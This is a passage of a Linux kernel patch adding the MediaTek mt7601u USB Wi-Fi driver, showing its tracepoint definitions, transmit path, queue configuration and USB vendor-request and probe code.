*u), + TP_ARGS(dev, u), + TP_STRUCT__entry( + DEV_ENTRY __field(unsigned, pipe) __field(u32, len) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->pipe = u->pipe; + __entry->len = u->transfer_buffer_length; + ), + TP_printk(DEV_PR_FMT "p:%08x len:%u", + DEV_PR_ARG, __entry->pipe, __entry->len) +); + +#define trace_mt_submit_urb_sync(__dev, __pipe, __len) ({ \ + struct urb u; \ + u.pipe = __pipe; \ + u.transfer_buffer_length = __len; \ + trace_mt_submit_urb(__dev, &u); \ +}) + +TRACE_EVENT(mt_mcu_msg_send, + TP_PROTO(struct mt7601u_dev *dev, + struct sk_buff *skb, u32 csum, bool resp), + TP_ARGS(dev, skb, csum, resp), + TP_STRUCT__entry( + DEV_ENTRY + __field(u32, info) + __field(u32, csum) + __field(bool, resp) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->info = *(u32 *)skb->data; + __entry->csum = csum; + __entry->resp = resp; + ), + TP_printk(DEV_PR_FMT "i:%08x c:%08x r:%d", + DEV_PR_ARG, __entry->info, __entry->csum, __entry->resp) +); + +TRACE_EVENT(mt_vend_req, + TP_PROTO(struct mt7601u_dev *dev, unsigned pipe, u8 req, u8 req_type, + u16 val, u16 offset, void *buf, size_t buflen, int ret), + TP_ARGS(dev, pipe, req, req_type, val, offset, buf, buflen, ret), + TP_STRUCT__entry( + DEV_ENTRY + __field(unsigned, pipe) __field(u8, req) __field(u8, req_type) + __field(u16, val) __field(u16, offset) __field(void*, buf) + __field(int, buflen) __field(int, ret) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->pipe = pipe; + __entry->req = req; + __entry->req_type = req_type; + __entry->val = val; + __entry->offset = offset; + __entry->buf = buf; + __entry->buflen = buflen; + __entry->ret = ret; + ), + TP_printk(DEV_PR_FMT + "%d p:%08x req:%02hhx %02hhx val:%04hx %04hx buf:%d %d", + DEV_PR_ARG, __entry->ret, __entry->pipe, __entry->req, + __entry->req_type, __entry->val, __entry->offset, + !!__entry->buf, __entry->buflen) +); + +TRACE_EVENT(ee_read, + TP_PROTO(struct mt7601u_dev *dev, int offset, u16 val), + TP_ARGS(dev, offset, val), + TP_STRUCT__entry( + DEV_ENTRY + __field(int, o) __field(u16, v) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->o = offset; + __entry->v = val; + ), + TP_printk(DEV_PR_FMT "%04x=%04x", DEV_PR_ARG, __entry->o, __entry->v) +); + +DECLARE_EVENT_CLASS(dev_rf_reg_evt, + TP_PROTO(struct mt7601u_dev *dev, u8 bank, u8 reg, u8 val), + TP_ARGS(dev, bank, 
reg, val), + TP_STRUCT__entry( + DEV_ENTRY + __field(u8, bank) + __field(u8, reg) + __field(u8, val) + ), + TP_fast_assign( + DEV_ASSIGN; + REG_ASSIGN; + __entry->bank = bank; + ), + TP_printk( + DEV_PR_FMT "%02hhx:%02hhx=%02hhx", + DEV_PR_ARG, __entry->bank, __entry->reg, __entry->val + ) +); + +DEFINE_EVENT(dev_rf_reg_evt, rf_read, + TP_PROTO(struct mt7601u_dev *dev, u8 bank, u8 reg, u8 val), + TP_ARGS(dev, bank, reg, val) +); + +DEFINE_EVENT(dev_rf_reg_evt, rf_write, + TP_PROTO(struct mt7601u_dev *dev, u8 bank, u8 reg, u8 val), + TP_ARGS(dev, bank, reg, val) +); + +DECLARE_EVENT_CLASS(dev_bbp_reg_evt, + TP_PROTO(struct mt7601u_dev *dev, u8 reg, u8 val), + TP_ARGS(dev, reg, val), + TP_STRUCT__entry( + DEV_ENTRY + __field(u8, reg) + __field(u8, val) + ), + TP_fast_assign( + DEV_ASSIGN; + REG_ASSIGN; + ), + TP_printk( + DEV_PR_FMT "%02hhx=%02hhx", + DEV_PR_ARG, __entry->reg, __entry->val + ) +); + +DEFINE_EVENT(dev_bbp_reg_evt, bbp_read, + TP_PROTO(struct mt7601u_dev *dev, u8 reg, u8 val), + TP_ARGS(dev, reg, val) +); + +DEFINE_EVENT(dev_bbp_reg_evt, bbp_write, + TP_PROTO(struct mt7601u_dev *dev, u8 reg, u8 val), + TP_ARGS(dev, reg, val) +); + +DECLARE_EVENT_CLASS(dev_simple_evt, + TP_PROTO(struct mt7601u_dev *dev, u8 val), + TP_ARGS(dev, val), + TP_STRUCT__entry( + DEV_ENTRY + __field(u8, val) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->val = val; + ), + TP_printk( + DEV_PR_FMT "%02hhx", DEV_PR_ARG, __entry->val + ) +); + +DEFINE_EVENT(dev_simple_evt, temp_mode, + TP_PROTO(struct mt7601u_dev *dev, u8 val), + TP_ARGS(dev, val) +); + +DEFINE_EVENT(dev_simple_evt, read_temp, + TP_PROTO(struct mt7601u_dev *dev, u8 val), + TP_ARGS(dev, val) +); + +DEFINE_EVENT(dev_simple_evt, freq_cal_adjust, + TP_PROTO(struct mt7601u_dev *dev, u8 val), + TP_ARGS(dev, val) +); + +TRACE_EVENT(freq_cal_offset, + TP_PROTO(struct mt7601u_dev *dev, u8 phy_mode, s8 freq_off), + TP_ARGS(dev, phy_mode, freq_off), + TP_STRUCT__entry( + DEV_ENTRY + __field(u8, phy_mode) + __field(s8, freq_off) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->phy_mode = phy_mode; + __entry->freq_off = freq_off; + ), + TP_printk(DEV_PR_FMT "phy:%02hhx off:%02hhx", + DEV_PR_ARG, __entry->phy_mode, __entry->freq_off) +); + +TRACE_EVENT(mt_rx, + TP_PROTO(struct mt7601u_dev *dev, struct mt7601u_rxwi *rxwi, u32 f), + TP_ARGS(dev, rxwi, f), + TP_STRUCT__entry( + DEV_ENTRY + __field_struct(struct mt7601u_rxwi, rxwi) + __field(u32, fce_info) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->rxwi = *rxwi; + __entry->fce_info = f; + ), + TP_printk(DEV_PR_FMT "rxi:%08x ctl:%08x frag_sn:%04hx rate:%04hx " + "uknw:%02hhx z:%02hhx%02hhx%02hhx snr:%02hhx " + "ant:%02hhx gain:%02hhx freq_o:%02hhx " + "r:%08x ea:%08x fce:%08x", DEV_PR_ARG, + le32_to_cpu(__entry->rxwi.rxinfo), + le32_to_cpu(__entry->rxwi.ctl), + le16_to_cpu(__entry->rxwi.frag_sn), + le16_to_cpu(__entry->rxwi.rate), + __entry->rxwi.unknown, + __entry->rxwi.zero[0], __entry->rxwi.zero[1], + __entry->rxwi.zero[2], + __entry->rxwi.snr, __entry->rxwi.ant, + __entry->rxwi.gain, __entry->rxwi.freq_off, + __entry->rxwi.resv2, __entry->rxwi.expert_ant, + __entry->fce_info) +); + +TRACE_EVENT(mt_tx, + TP_PROTO(struct mt7601u_dev *dev, struct sk_buff *skb, + struct mt76_sta *sta, struct mt76_txwi *h), + TP_ARGS(dev, skb, sta, h), + TP_STRUCT__entry( + DEV_ENTRY + __field_struct(struct mt76_txwi, h) + __field(struct sk_buff *, skb) + __field(struct mt76_sta *, sta) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->h = *h; + __entry->skb = skb; + __entry->sta = sta; + ), + TP_printk(DEV_PR_FMT "skb:%p 
sta:%p flg:%04hx rate_ctl:%04hx " + "ack:%02hhx wcid:%02hhx len_ctl:%05hx", DEV_PR_ARG, + __entry->skb, __entry->sta, + le16_to_cpu(__entry->h.flags), + le16_to_cpu(__entry->h.rate_ctl), + __entry->h.ack_ctl, __entry->h.wcid, + le16_to_cpu(__entry->h.len_ctl)) +); + +TRACE_EVENT(mt_tx_dma_done, + TP_PROTO(struct mt7601u_dev *dev, struct sk_buff *skb), + TP_ARGS(dev, skb), + TP_STRUCT__entry( + DEV_ENTRY + __field(struct sk_buff *, skb) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->skb = skb; + ), + TP_printk(DEV_PR_FMT "%p", DEV_PR_ARG, __entry->skb) +); + +TRACE_EVENT(mt_tx_status_cleaned, + TP_PROTO(struct mt7601u_dev *dev, int cleaned), + TP_ARGS(dev, cleaned), + TP_STRUCT__entry( + DEV_ENTRY + __field(int, cleaned) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->cleaned = cleaned; + ), + TP_printk(DEV_PR_FMT "%d", DEV_PR_ARG, __entry->cleaned) +); + +TRACE_EVENT(mt_tx_status, + TP_PROTO(struct mt7601u_dev *dev, u32 stat1, u32 stat2), + TP_ARGS(dev, stat1, stat2), + TP_STRUCT__entry( + DEV_ENTRY + __field(u32, stat1) __field(u32, stat2) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->stat1 = stat1; + __entry->stat2 = stat2; + ), + TP_printk(DEV_PR_FMT "%08x %08x", + DEV_PR_ARG, __entry->stat1, __entry->stat2) +); + +TRACE_EVENT(mt_rx_dma_aggr, + TP_PROTO(struct mt7601u_dev *dev, int cnt, bool paged), + TP_ARGS(dev, cnt, paged), + TP_STRUCT__entry( + DEV_ENTRY + __field(u8, cnt) + __field(bool, paged) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->cnt = cnt; + __entry->paged = paged; + ), + TP_printk(DEV_PR_FMT "cnt:%d paged:%d", + DEV_PR_ARG, __entry->cnt, __entry->paged) +); + +DEFINE_EVENT(dev_simple_evt, set_key, + TP_PROTO(struct mt7601u_dev *dev, u8 val), + TP_ARGS(dev, val) +); + +TRACE_EVENT(set_shared_key, + TP_PROTO(struct mt7601u_dev *dev, u8 vid, u8 key), + TP_ARGS(dev, vid, key), + TP_STRUCT__entry( + DEV_ENTRY + __field(u8, vid) + __field(u8, key) + ), + TP_fast_assign( + DEV_ASSIGN; + __entry->vid = vid; + __entry->key = key; + ), + TP_printk(DEV_PR_FMT "phy:%02hhx off:%02hhx", + DEV_PR_ARG, __entry->vid, __entry->key) +); + +#endif + +#undef TRACE_INCLUDE_PATH +#define TRACE_INCLUDE_PATH . +#undef TRACE_INCLUDE_FILE +#define TRACE_INCLUDE_FILE trace + +#include diff --git a/drivers/net/wireless/mediatek/mt7601u/tx.c b/drivers/net/wireless/mediatek/mt7601u/tx.c new file mode 100644 index 000000000000..0be2080ceab3 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/tx.c @@ -0,0 +1,319 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. 
+ */ + +#include "mt7601u.h" +#include "trace.h" + +enum mt76_txq_id { + MT_TXQ_VO = IEEE80211_AC_VO, + MT_TXQ_VI = IEEE80211_AC_VI, + MT_TXQ_BE = IEEE80211_AC_BE, + MT_TXQ_BK = IEEE80211_AC_BK, + MT_TXQ_PSD, + MT_TXQ_MCU, + __MT_TXQ_MAX +}; + +/* Hardware uses mirrored order of queues with Q0 having the highest priority */ +static u8 q2hwq(u8 q) +{ + return q ^ 0x3; +} + +/* Take mac80211 Q id from the skb and translate it to hardware Q id */ +static u8 skb2q(struct sk_buff *skb) +{ + int qid = skb_get_queue_mapping(skb); + + if (WARN_ON(qid >= MT_TXQ_PSD)) { + qid = MT_TXQ_BE; + skb_set_queue_mapping(skb, qid); + } + + return q2hwq(qid); +} + +/* Note: TX retry reporting is a bit broken. + * Retries are reported only once per AMPDU and often come a frame early + * i.e. they are reported in the last status preceding the AMPDU. Apart + * from the fact that it's hard to know the length of the AMPDU (which is + * required to know to how many consecutive frames retries should be + * applied), if status comes early on full FIFO it gets lost and retries + * of the whole AMPDU become invisible. + * As a work-around encode the desired rate in PKT_ID of TX descriptor + * and based on that guess the retries (every rate is tried once). + * Only downside here is that for MCS0 we have to rely solely on + * transmission failures as no retries can ever be reported. + * Not having to read EXT_FIFO has a nice effect of doubling the number + * of reports which can be fetched. + * Also the vendor driver never uses the EXT_FIFO register so it may be + * undertested. + */ +static u8 mt7601u_tx_pktid_enc(struct mt7601u_dev *dev, u8 rate, bool is_probe) +{ + u8 encoded = (rate + 1) + is_probe * 8; + + /* Because PKT_ID 0 disables status reporting only 15 values are + * available but 16 are needed (8 MCS * 2 for encoding is_probe) + * - we need to cram together two rates. MCS0 and MCS7 with is_probe + * share PKT_ID 9. 
+ */ + if (is_probe && rate == 7) + return encoded - 7; + + return encoded; +} + +static void +mt7601u_tx_pktid_dec(struct mt7601u_dev *dev, struct mt76_tx_status *stat) +{ + u8 req_rate = stat->pktid; + u8 eff_rate = stat->rate & 0x7; + + req_rate -= 1; + + if (req_rate > 7) { + stat->is_probe = true; + req_rate -= 8; + + /* Decide between MCS0 and MCS7 which share pktid 9 */ + if (!req_rate && eff_rate) + req_rate = 7; + } + + stat->retry = req_rate - eff_rate; +} + +static void mt7601u_tx_skb_remove_dma_overhead(struct sk_buff *skb, + struct ieee80211_tx_info *info) +{ + int pkt_len = (unsigned long)info->status.status_driver_data[0]; + + skb_pull(skb, sizeof(struct mt76_txwi) + 4); + if (ieee80211_get_hdrlen_from_skb(skb) % 4) + mt76_remove_hdr_pad(skb); + + skb_trim(skb, pkt_len); +} + +void mt7601u_tx_status(struct mt7601u_dev *dev, struct sk_buff *skb) +{ + struct ieee80211_tx_info *info = IEEE80211_SKB_CB(skb); + + mt7601u_tx_skb_remove_dma_overhead(skb, info); + + ieee80211_tx_info_clear_status(info); + info->status.rates[0].idx = -1; + info->flags |= IEEE80211_TX_STAT_ACK; + ieee80211_tx_status(dev->hw, skb); +} + +static int mt7601u_skb_rooms(struct mt7601u_dev *dev, struct sk_buff *skb) +{ + int hdr_len = ieee80211_get_hdrlen_from_skb(skb); + u32 need_head; + + need_head = sizeof(struct mt76_txwi) + 4; + if (hdr_len % 4) + need_head += 2; + + return skb_cow(skb, need_head); +} + +static struct mt76_txwi * +mt7601u_push_txwi(struct mt7601u_dev *dev, struct sk_buff *skb, + struct ieee80211_sta *sta, struct mt76_wcid *wcid, + int pkt_len) +{ + struct ieee80211_tx_info *info = IEEE80211_SKB_CB(skb); + struct ieee80211_tx_rate *rate = &info->control.rates[0]; + struct mt76_txwi *txwi; + unsigned long flags; + bool is_probe; + u32 pkt_id; + u16 rate_ctl; + u8 nss; + + txwi = (struct mt76_txwi *)skb_push(skb, sizeof(struct mt76_txwi)); + memset(txwi, 0, sizeof(*txwi)); + + if (!wcid->tx_rate_set) + ieee80211_get_tx_rates(info->control.vif, sta, skb, + info->control.rates, 1); + + spin_lock_irqsave(&dev->lock, flags); + if (rate->idx < 0 || !rate->count) + rate_ctl = wcid->tx_rate; + else + rate_ctl = mt76_mac_tx_rate_val(dev, rate, &nss); + spin_unlock_irqrestore(&dev->lock, flags); + txwi->rate_ctl = cpu_to_le16(rate_ctl); + + if (!(info->flags & IEEE80211_TX_CTL_NO_ACK)) + txwi->ack_ctl |= MT_TXWI_ACK_CTL_REQ; + if (info->flags & IEEE80211_TX_CTL_ASSIGN_SEQ) + txwi->ack_ctl |= MT_TXWI_ACK_CTL_NSEQ; + + if ((info->flags & IEEE80211_TX_CTL_AMPDU) && sta) { + u8 ba_size = IEEE80211_MIN_AMPDU_BUF; + + ba_size <<= sta->ht_cap.ampdu_factor; + ba_size = min_t(int, 63, ba_size); + if (info->flags & IEEE80211_TX_CTL_RATE_CTRL_PROBE) + ba_size = 0; + txwi->ack_ctl |= MT76_SET(MT_TXWI_ACK_CTL_BA_WINDOW, ba_size); + + txwi->flags = cpu_to_le16(MT_TXWI_FLAGS_AMPDU | + MT76_SET(MT_TXWI_FLAGS_MPDU_DENSITY, + sta->ht_cap.ampdu_density)); + if (info->flags & IEEE80211_TX_CTL_RATE_CTRL_PROBE) + txwi->flags = 0; + } + + txwi->wcid = wcid->idx; + + is_probe = !!(info->flags & IEEE80211_TX_CTL_RATE_CTRL_PROBE); + pkt_id = mt7601u_tx_pktid_enc(dev, rate_ctl & 0x7, is_probe); + pkt_len |= MT76_SET(MT_TXWI_LEN_PKTID, pkt_id); + txwi->len_ctl = cpu_to_le16(pkt_len); + + return txwi; +} + +void mt7601u_tx(struct ieee80211_hw *hw, struct ieee80211_tx_control *control, + struct sk_buff *skb) +{ + struct ieee80211_tx_info *info = IEEE80211_SKB_CB(skb); + struct mt7601u_dev *dev = hw->priv; + struct ieee80211_vif *vif = info->control.vif; + struct ieee80211_sta *sta = control->sta; + struct mt76_sta *msta = 
NULL; + struct mt76_wcid *wcid = dev->mon_wcid; + struct mt76_txwi *txwi; + int pkt_len = skb->len; + int hw_q = skb2q(skb); + + BUILD_BUG_ON(ARRAY_SIZE(info->status.status_driver_data) < 1); + info->status.status_driver_data[0] = (void *)(unsigned long)pkt_len; + + if (mt7601u_skb_rooms(dev, skb) || mt76_insert_hdr_pad(skb)) { + ieee80211_free_txskb(dev->hw, skb); + return; + } + + if (sta) { + msta = (struct mt76_sta *) sta->drv_priv; + wcid = &msta->wcid; + } else if (vif) { + struct mt76_vif *mvif = (struct mt76_vif *)vif->drv_priv; + + wcid = &mvif->group_wcid; + } + + txwi = mt7601u_push_txwi(dev, skb, sta, wcid, pkt_len); + + if (mt7601u_dma_enqueue_tx(dev, skb, wcid, hw_q)) + return; + + trace_mt_tx(dev, skb, msta, txwi); +} + +void mt7601u_tx_stat(struct work_struct *work) +{ + struct mt7601u_dev *dev = container_of(work, struct mt7601u_dev, + stat_work.work); + struct mt76_tx_status stat; + unsigned long flags; + int cleaned = 0; + + while (!test_bit(MT7601U_STATE_REMOVED, &dev->state)) { + stat = mt7601u_mac_fetch_tx_status(dev); + if (!stat.valid) + break; + + mt7601u_tx_pktid_dec(dev, &stat); + mt76_send_tx_status(dev, &stat); + + cleaned++; + } + trace_mt_tx_status_cleaned(dev, cleaned); + + spin_lock_irqsave(&dev->tx_lock, flags); + if (cleaned) + queue_delayed_work(dev->stat_wq, &dev->stat_work, + msecs_to_jiffies(10)); + else if (test_and_clear_bit(MT7601U_STATE_MORE_STATS, &dev->state)) + queue_delayed_work(dev->stat_wq, &dev->stat_work, + msecs_to_jiffies(20)); + else + clear_bit(MT7601U_STATE_READING_STATS, &dev->state); + spin_unlock_irqrestore(&dev->tx_lock, flags); +} + +int mt7601u_conf_tx(struct ieee80211_hw *hw, struct ieee80211_vif *vif, + u16 queue, const struct ieee80211_tx_queue_params *params) +{ + struct mt7601u_dev *dev = hw->priv; + u8 cw_min = 5, cw_max = 10, hw_q = q2hwq(queue); + u32 val; + + /* TODO: should we do funny things with the parameters? + * See what mt7601u_set_default_edca() used to do in init.c. + */ + + if (params->cw_min) + cw_min = fls(params->cw_min); + if (params->cw_max) + cw_max = fls(params->cw_max); + + WARN_ON(params->txop > 0xff); + WARN_ON(params->aifs > 0xf); + WARN_ON(cw_min > 0xf); + WARN_ON(cw_max > 0xf); + + val = MT76_SET(MT_EDCA_CFG_AIFSN, params->aifs) | + MT76_SET(MT_EDCA_CFG_CWMIN, cw_min) | + MT76_SET(MT_EDCA_CFG_CWMAX, cw_max); + /* TODO: based on user-controlled EnableTxBurst var vendor drv sets + * a really long txop on AC0 (see connect.c:2009) but only on + * connect? When not connected should be 0. 
+ */ + if (!hw_q) + val |= 0x60; + else + val |= MT76_SET(MT_EDCA_CFG_TXOP, params->txop); + mt76_wr(dev, MT_EDCA_CFG_AC(hw_q), val); + + val = mt76_rr(dev, MT_WMM_TXOP(hw_q)); + val &= ~(MT_WMM_TXOP_MASK << MT_WMM_TXOP_SHIFT(hw_q)); + val |= params->txop << MT_WMM_TXOP_SHIFT(hw_q); + mt76_wr(dev, MT_WMM_TXOP(hw_q), val); + + val = mt76_rr(dev, MT_WMM_AIFSN); + val &= ~(MT_WMM_AIFSN_MASK << MT_WMM_AIFSN_SHIFT(hw_q)); + val |= params->aifs << MT_WMM_AIFSN_SHIFT(hw_q); + mt76_wr(dev, MT_WMM_AIFSN, val); + + val = mt76_rr(dev, MT_WMM_CWMIN); + val &= ~(MT_WMM_CWMIN_MASK << MT_WMM_CWMIN_SHIFT(hw_q)); + val |= cw_min << MT_WMM_CWMIN_SHIFT(hw_q); + mt76_wr(dev, MT_WMM_CWMIN, val); + + val = mt76_rr(dev, MT_WMM_CWMAX); + val &= ~(MT_WMM_CWMAX_MASK << MT_WMM_CWMAX_SHIFT(hw_q)); + val |= cw_max << MT_WMM_CWMAX_SHIFT(hw_q); + mt76_wr(dev, MT_WMM_CWMAX, val); + + return 0; +} diff --git a/drivers/net/wireless/mediatek/mt7601u/usb.c b/drivers/net/wireless/mediatek/mt7601u/usb.c new file mode 100644 index 000000000000..99e2b3997bfa --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/usb.c @@ -0,0 +1,360 @@ +/* + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include +#include +#include + +#include "mt7601u.h" +#include "usb.h" +#include "trace.h" + +static struct usb_device_id mt7601u_device_table[] = { + { USB_DEVICE(0x0b05, 0x17d3) }, + { USB_DEVICE(0x0e8d, 0x760a) }, + { USB_DEVICE(0x0e8d, 0x760b) }, + { USB_DEVICE(0x13d3, 0x3431) }, + { USB_DEVICE(0x13d3, 0x3434) }, + { USB_DEVICE(0x148f, 0x7601) }, + { USB_DEVICE(0x148f, 0x760a) }, + { USB_DEVICE(0x148f, 0x760b) }, + { USB_DEVICE(0x148f, 0x760c) }, + { USB_DEVICE(0x148f, 0x760d) }, + { USB_DEVICE(0x2001, 0x3d04) }, + { USB_DEVICE(0x2717, 0x4106) }, + { USB_DEVICE(0x2955, 0x0001) }, + { USB_DEVICE(0x2955, 0x1001) }, + { USB_DEVICE(0x2a5f, 0x1000) }, + { USB_DEVICE(0x7392, 0x7710) }, + { 0, } +}; + +bool mt7601u_usb_alloc_buf(struct mt7601u_dev *dev, size_t len, + struct mt7601u_dma_buf *buf) +{ + struct usb_device *usb_dev = mt7601u_to_usb_dev(dev); + + buf->len = len; + buf->urb = usb_alloc_urb(0, GFP_KERNEL); + buf->buf = usb_alloc_coherent(usb_dev, buf->len, GFP_KERNEL, &buf->dma); + + return !buf->urb || !buf->buf; +} + +void mt7601u_usb_free_buf(struct mt7601u_dev *dev, struct mt7601u_dma_buf *buf) +{ + struct usb_device *usb_dev = mt7601u_to_usb_dev(dev); + + usb_free_coherent(usb_dev, buf->len, buf->buf, buf->dma); + usb_free_urb(buf->urb); +} + +int mt7601u_usb_submit_buf(struct mt7601u_dev *dev, int dir, int ep_idx, + struct mt7601u_dma_buf *buf, gfp_t gfp, + usb_complete_t complete_fn, void *context) +{ + struct usb_device *usb_dev = mt7601u_to_usb_dev(dev); + unsigned pipe; + int ret; + + if (dir == USB_DIR_IN) + pipe = usb_rcvbulkpipe(usb_dev, dev->in_eps[ep_idx]); + else + pipe = usb_sndbulkpipe(usb_dev, dev->out_eps[ep_idx]); + + usb_fill_bulk_urb(buf->urb, usb_dev, pipe, buf->buf, buf->len, + complete_fn, context); + buf->urb->transfer_dma = buf->dma; + buf->urb->transfer_flags |= URB_NO_TRANSFER_DMA_MAP; + + trace_mt_submit_urb(dev, buf->urb); + ret = usb_submit_urb(buf->urb, gfp); + if 
(ret) + dev_err(dev->dev, "Error: submit URB dir:%d ep:%d failed:%d\n", + dir, ep_idx, ret); + return ret; +} + +void mt7601u_complete_urb(struct urb *urb) +{ + struct completion *cmpl = urb->context; + + complete(cmpl); +} + +static int +__mt7601u_vendor_request(struct mt7601u_dev *dev, const u8 req, + const u8 direction, const u16 val, const u16 offset, + void *buf, const size_t buflen) +{ + int i, ret; + struct usb_device *usb_dev = mt7601u_to_usb_dev(dev); + const u8 req_type = direction | USB_TYPE_VENDOR | USB_RECIP_DEVICE; + const unsigned int pipe = (direction == USB_DIR_IN) ? + usb_rcvctrlpipe(usb_dev, 0) : usb_sndctrlpipe(usb_dev, 0); + + for (i = 0; i < MT_VEND_REQ_MAX_RETRY; i++) { + ret = usb_control_msg(usb_dev, pipe, req, req_type, + val, offset, buf, buflen, + MT_VEND_REQ_TOUT_MS); + trace_mt_vend_req(dev, pipe, req, req_type, val, offset, + buf, buflen, ret); + + if (ret >= 0 || ret == -ENODEV) + return ret; + + msleep(5); + } + + dev_err(dev->dev, "Vendor request req:%02x off:%04x failed:%d\n", + req, offset, ret); + + return ret; +} + +int +mt7601u_vendor_request(struct mt7601u_dev *dev, const u8 req, + const u8 direction, const u16 val, const u16 offset, + void *buf, const size_t buflen) +{ + int ret; + + mutex_lock(&dev->vendor_req_mutex); + + ret = __mt7601u_vendor_request(dev, req, direction, val, offset, + buf, buflen); + if (ret == -ENODEV) + set_bit(MT7601U_STATE_REMOVED, &dev->state); + + mutex_unlock(&dev->vendor_req_mutex); + + return ret; +} + +void mt7601u_vendor_reset(struct mt7601u_dev *dev) +{ + mt7601u_vendor_request(dev, MT_VEND_DEV_MODE, USB_DIR_OUT, + MT_VEND_DEV_MODE_RESET, 0, NULL, 0); +} + +u32 mt7601u_rr(struct mt7601u_dev *dev, u32 offset) +{ + int ret; + __le32 reg; + u32 val; + + WARN_ONCE(offset > USHRT_MAX, "read high off:%08x", offset); + + ret = mt7601u_vendor_request(dev, MT_VEND_MULTI_READ, USB_DIR_IN, + 0, offset, ®, sizeof(reg)); + val = le32_to_cpu(reg); + if (ret > 0 && ret != sizeof(reg)) { + dev_err(dev->dev, "Error: wrong size read:%d off:%08x\n", + ret, offset); + val = ~0; + } + + trace_reg_read(dev, offset, val); + return val; +} + +int mt7601u_vendor_single_wr(struct mt7601u_dev *dev, const u8 req, + const u16 offset, const u32 val) +{ + int ret; + + ret = mt7601u_vendor_request(dev, req, USB_DIR_OUT, + val & 0xffff, offset, NULL, 0); + if (ret) + return ret; + return mt7601u_vendor_request(dev, req, USB_DIR_OUT, + val >> 16, offset + 2, NULL, 0); +} + +void mt7601u_wr(struct mt7601u_dev *dev, u32 offset, u32 val) +{ + WARN_ONCE(offset > USHRT_MAX, "write high off:%08x", offset); + + mt7601u_vendor_single_wr(dev, MT_VEND_WRITE, offset, val); + trace_reg_write(dev, offset, val); +} + +u32 mt7601u_rmw(struct mt7601u_dev *dev, u32 offset, u32 mask, u32 val) +{ + val |= mt7601u_rr(dev, offset) & ~mask; + mt7601u_wr(dev, offset, val); + return val; +} + +u32 mt7601u_rmc(struct mt7601u_dev *dev, u32 offset, u32 mask, u32 val) +{ + u32 reg = mt7601u_rr(dev, offset); + + val |= reg & ~mask; + if (reg != val) + mt7601u_wr(dev, offset, val); + return val; +} + +void mt7601u_wr_copy(struct mt7601u_dev *dev, u32 offset, + const void *data, int len) +{ + WARN_ONCE(offset & 3, "unaligned write copy off:%08x", offset); + WARN_ONCE(len & 3, "short write copy off:%08x", offset); + + mt7601u_burst_write_regs(dev, offset, data, len / 4); +} + +void mt7601u_addr_wr(struct mt7601u_dev *dev, const u32 offset, const u8 *addr) +{ + mt7601u_wr(dev, offset, get_unaligned_le32(addr)); + mt7601u_wr(dev, offset + 4, addr[4] | addr[5] << 8); +} + +static int 
mt7601u_assign_pipes(struct usb_interface *usb_intf, + struct mt7601u_dev *dev) +{ + struct usb_endpoint_descriptor *ep_desc; + struct usb_host_interface *intf_desc = usb_intf->cur_altsetting; + unsigned i, ep_i = 0, ep_o = 0; + + BUILD_BUG_ON(sizeof(dev->in_eps) < __MT_EP_IN_MAX); + BUILD_BUG_ON(sizeof(dev->out_eps) < __MT_EP_OUT_MAX); + + for (i = 0; i < intf_desc->desc.bNumEndpoints; i++) { + ep_desc = &intf_desc->endpoint[i].desc; + + if (usb_endpoint_is_bulk_in(ep_desc) && + ep_i++ < __MT_EP_IN_MAX) { + dev->in_eps[ep_i - 1] = usb_endpoint_num(ep_desc); + dev->in_max_packet = usb_endpoint_maxp(ep_desc); + /* Note: this is ignored by usb sub-system but vendor + * code does it. We can drop this at some point. + */ + dev->in_eps[ep_i - 1] |= USB_DIR_IN; + } else if (usb_endpoint_is_bulk_out(ep_desc) && + ep_o++ < __MT_EP_OUT_MAX) { + dev->out_eps[ep_o - 1] = usb_endpoint_num(ep_desc); + dev->out_max_packet = usb_endpoint_maxp(ep_desc); + } + } + + if (ep_i != __MT_EP_IN_MAX || ep_o != __MT_EP_OUT_MAX) { + dev_err(dev->dev, "Error: wrong pipe number in:%d out:%d\n", + ep_i, ep_o); + return -EINVAL; + } + + return 0; +} + +static int mt7601u_probe(struct usb_interface *usb_intf, + const struct usb_device_id *id) +{ + struct usb_device *usb_dev = interface_to_usbdev(usb_intf); + struct mt7601u_dev *dev; + u32 asic_rev, mac_rev; + int ret; + + dev = mt7601u_alloc_device(&usb_intf->dev); + if (!dev) + return -ENOMEM; + + usb_dev = usb_get_dev(usb_dev); + usb_reset_device(usb_dev); + + usb_set_intfdata(usb_intf, dev); + + ret = mt7601u_assign_pipes(usb_intf, dev); + if (ret) + goto err; + ret = mt7601u_wait_asic_ready(dev); + if (ret) + goto err; + + asic_rev = mt7601u_rr(dev, MT_ASIC_VERSION); + mac_rev = mt7601u_rr(dev, MT_MAC_CSR0); + dev_info(dev->dev, "ASIC revision: %08x MAC revision: %08x\n", + asic_rev, mac_rev); + + /* Note: vendor driver skips this check for MT7601U */ + if (!(mt7601u_rr(dev, MT_EFUSE_CTRL) & MT_EFUSE_CTRL_SEL)) + dev_warn(dev->dev, "Warning: eFUSE not present\n"); + + ret = mt7601u_init_hardware(dev); + if (ret) + goto err; + ret = mt7601u_register_device(dev); + if (ret) + goto err_hw; + + set_bit(MT7601U_STATE_INITIALIZED, &dev->state); + 